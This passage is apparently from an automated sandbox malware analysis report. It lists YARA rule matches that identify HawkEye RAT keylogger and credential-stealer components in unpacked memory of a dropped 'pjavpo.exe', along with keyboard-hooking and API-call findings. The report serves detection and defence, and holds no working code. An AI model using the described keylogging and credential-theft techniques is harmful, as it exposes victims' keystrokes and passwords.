                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Contains functionality to log keystrokes (.Net Source)
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs.Net Code: HookKeyboard
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00406043
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00404618
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_0040681A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E101
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414C54
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414C54
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00414170
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00416E2D
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00415EC1
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_004146E2
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040314F
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_00412F84
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0040A2A5
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307A60
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02305758
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02306048
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307DB8
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02307098
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02301D98
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0230708A
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02301DA8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404DDB
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_0040BD8A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404E4C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404EBD
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00404F4E
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00404419
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00404516
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00413538
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004145A1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_0040E639
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004337AF
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_004399B1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_0043DAE7
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00405CF6
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00403F85
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00411F99
                Source: TGQfHfehsY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 5.2.pjavpo.exe.7bf0000.21.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
